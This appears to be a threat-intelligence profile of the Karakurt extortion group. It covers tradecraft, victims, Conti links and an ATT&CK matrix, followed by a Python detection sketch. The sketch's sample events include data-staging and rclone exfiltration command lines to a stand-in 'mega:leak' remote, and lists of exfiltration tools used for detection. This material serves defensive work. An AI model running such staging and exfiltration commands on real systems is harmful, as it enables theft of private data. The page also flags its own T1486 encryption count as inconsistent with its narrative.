Mallory
2 malware families

Karakurt

Also known as: Karakurt

Karakurt is a Russian-linked cybercriminal extortion group active since at least mid-2021. It is widely described as a data-theft and extortion operation rather than a traditional encryption-focused ransomware group: multiple sources in the collected reporting call it extortion-only or encryption-less, meaning it compromises company systems, steals data, and demands payment in cryptocurrency under threat of leaking or selling the stolen information, without encrypting the victim's files. Reported ransom demands ranged from $25,000 to $13 million in Bitcoin.

The group operated a public leak site and auction portal, later adding a search capability to make stolen data easier to find and to increase pressure on victims. U.S. government reporting cited here states that Karakurt often contacted victims' employees, business partners, and clients with harassing emails and phone calls, and published press releases naming non-paying victims. The same reporting states that the group often selected victims based on ease of access rather than industry.

The reporting repeatedly links Karakurt to the Conti ecosystem, describing it variously as a data extortion arm, side operation, spin-off, or successor-linked group associated with former Conti members or leaders; some sources state that former Conti members splintered into Karakurt after Conti's shutdown. Additional reporting says the broader organization used multiple extortion brands, including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira.

Observed tradecraft includes initial access via purchased stolen login credentials or access bought from other criminals, including stolen VPN credentials; use of Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, FileZilla, and Mega.io; data staging and exfiltration; and extortion without deploying encryption tools. AnyDesk has also been used as a persistence mechanism. One caveat for defenders: the technique matrix on this page nonetheless credits Karakurt with T1486 (Data Encrypted for Impact) in 13 reports, more than any other technique, while none of the narrative reporting summarized here describes encryption. Treat the encryption-less profile as the better-supported one, and reconcile that T1486 count against the individual source reports before building detections or playbooks on it.
Victimology shows heavy targeting of North America: one source states that about 95% of victims published during a 2021 period were based there, with the remaining victims in Europe. Reported victims and impacts include healthcare organizations, a pediatric healthcare provider, U.S. government entities including one whose 911 emergency dispatch system was disrupted, the International Centre for Migration Policy Development (ICMPD), and Chattanooga Heart Institute. The reporting also states that Karakurt stole children's health information in at least one case.

Aliases and associated names mentioned directly in the reporting are Karakurt, TommyLeaks, SchoolBoys Ransomware, Royal, Conti, and Akira, described in some reporting as brands used by the same broader organization. The online alias "Sforza_cesarini" is linked to member Deniss Zolotarjovs, a negotiator associated with Karakurt who was arrested in Georgia, extradited to the United States, and later sentenced in U.S. court.
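The tradecraft above (AnyDesk registered as a service for persistence, 7-Zip/WinZip staging, Rclone or Mega.io for exfiltration) maps to T1543.003, T1560 and T1567.002 in the matrix below, and the interesting signal is the chain, not any single tool. The following is an added detection sketch, not code from the original page or from Mallory: it runs three rules over constructed Windows telemetry shaped like System Event ID 7045 (service installed) and Sysmon Event ID 1 (process create) records, then correlates archive creation followed by a cloud-sync run per user. Field names, paths, user names and the `mega:leak` remote are assumptions for illustration, not real IOCs.

```python
"""Detection sketch for Karakurt-style encryption-less extortion tradecraft.

Added example, not from the original page or any vendor. Events are
constructed to resemble Windows System 7045 and Sysmon 1 records; field
names are assumptions, not a real schema.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real captures). Paths, users and the
# rclone remote name "mega:leak" are illustrative assumptions.
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "AnyDesk Service", "Account": "LocalSystem",
     "ImagePath": r"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe --service"},
    {"id": 1, "User": r"CORP\svc_backup",
     "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r'7z.exe a -mx1 -pS3cret C:\Staging\finance.7z "D:\Shares\Finance"'},
    {"id": 1, "User": r"CORP\svc_backup",
     "Image": r"C:\Users\jdoe\Downloads\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Staging mega:leak --transfers 32 -q"},
    {"id": 1, "User": r"CORP\jdoe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]

# Tool names come from the page's tradecraft list; the sets are deliberately
# small and should be extended for a production rule.
RAT_MARKERS = ("anydesk",)
ARCHIVERS = ("7z.exe", "7za.exe", "7zg.exe", "wzzip.exe", "winzip64.exe", "winzip32.exe")
CLOUD_SYNC = ("rclone.exe", "filezilla.exe", "megasync.exe", "megacmd.exe", "mega-put.exe")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
PASSWORD_FLAG = re.compile(r"(?:^|\s)-p\S+")  # 7-Zip syntax: -pPASSWORD, no space


@dataclass
class Finding:
    technique: str
    rule: str
    event: dict


def rat_service_install(ev: dict) -> bool:
    """T1543.003 / T1219: a remote-access tool registered as a Windows service.
    Karakurt used AnyDesk for persistence; a service binary under a user
    profile rather than Program Files is the stronger signal."""
    if ev.get("id") != 7045:
        return False
    blob = f"{ev.get('ServiceName', '')} {ev.get('ImagePath', '')}".lower()
    return any(m in blob for m in RAT_MARKERS)


def password_archive(ev: dict) -> bool:
    """T1560: 7-Zip/WinZip creating a password-protected archive (staging)."""
    if ev.get("id") != 1:
        return False
    image = ev.get("Image", "").lower()
    return any(image.endswith(a) for a in ARCHIVERS) and bool(PASSWORD_FLAG.search(ev.get("CommandLine", "")))


def cloud_sync_exfil(ev: dict) -> bool:
    """T1567.002 / T1020: rclone, FileZilla or Mega tooling pushing data out.
    Fires when the binary runs from a user-writable path or the command
    targets an rclone remote named "mega"."""
    if ev.get("id") != 1:
        return False
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    if not any(image.endswith(t) for t in CLOUD_SYNC):
        return False
    return bool(USER_WRITABLE.search(image)) or " mega:" in cmd


RULES = [
    ("T1543.003", "remote-access tool installed as a Windows service", rat_service_install),
    ("T1560", "password-protected archive created for staging", password_archive),
    ("T1567.002", "cloud sync tool run to exfiltrate staged data", cloud_sync_exfil),
]


def run_rules(events):
    """Apply every rule to every event; returns findings in event order."""
    return [Finding(t, name, ev) for ev in events for t, name, pred in RULES if pred(ev)]


def staged_then_exfiltrated(findings):
    """Per-user correlation: archive creation plus a cloud-sync run is the
    encryption-less chain this actor is known for and merits a higher
    severity than either rule alone. Returns the affected users, sorted."""
    seen = {}
    for f in findings:
        user = f.event.get("User")
        if user:
            seen.setdefault(user, set()).add(f.technique)
    return sorted(u for u, techs in seen.items() if {"T1560", "T1567.002"} <= techs)


if __name__ == "__main__":
    hits = run_rules(SAMPLE_EVENTS)
    for h in hits:
        print(h.technique, h.rule, "|", h.event.get("Image") or h.event.get("ImagePath"))
    print("staged-then-exfiltrated users:", staged_then_exfiltrated(hits))
```

The per-rule matches are noisy on their own (backup jobs legitimately run rclone, admins legitimately install AnyDesk); the correlation in `staged_then_exfiltrated` is what lifts the alert out of the noise, and in a real pipeline it should also be bounded by a time window and keyed on host as well as user.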

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics; 27 technique cells (a technique that maps to several tactics is counted once under each)
×N = number of intelligence reports citing this technique
TA0043
Reconnaissance
2 techniques
T1589×6
Gather Victim Identity Information
T1598
Phishing for Information
TA0001
Initial Access
2 techniques
T1078×2
Valid Accounts
T1133×2
External Remote Services
TA0002
Execution
1 technique
T1059
Command and Scripting Interpreter
T1059.001
PowerShell
TA0003
Persistence
3 techniques
T1078×2
Valid Accounts
T1133×2
External Remote Services
T1543
Create or Modify System Process
T1543.003×2
Windows Service
TA0004
Privilege Escalation
2 techniques
T1078×2
Valid Accounts
T1543
Create or Modify System Process
T1543.003×2
Windows Service
TA0005
Defense Evasion
1 technique
T1078×2
Valid Accounts
TA0006
Credential Access
1 technique
T1003
OS Credential Dumping
TA0009
Collection
3 techniques
T1005×2
Data from Local System
T1074
Data Staged
T1560
Archive Collected Data
TA0011
Command and Control
2 techniques
T1105
Ingress Tool Transfer
T1219×2
Remote Access Tools
TA0010
Exfiltration
4 techniques
T1020×2
Automated Exfiltration
T1041×3
Exfiltration Over C2 Channel
T1537
Transfer Data to Cloud Account
T1567×6
Exfiltration Over Web Service
T1567.002
Exfiltration to Cloud Storage
TA0040
Impact
2 techniques
T1486×13
Data Encrypted for Impact
T1657×10
Financial Theft
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping (19)

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal (2)

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.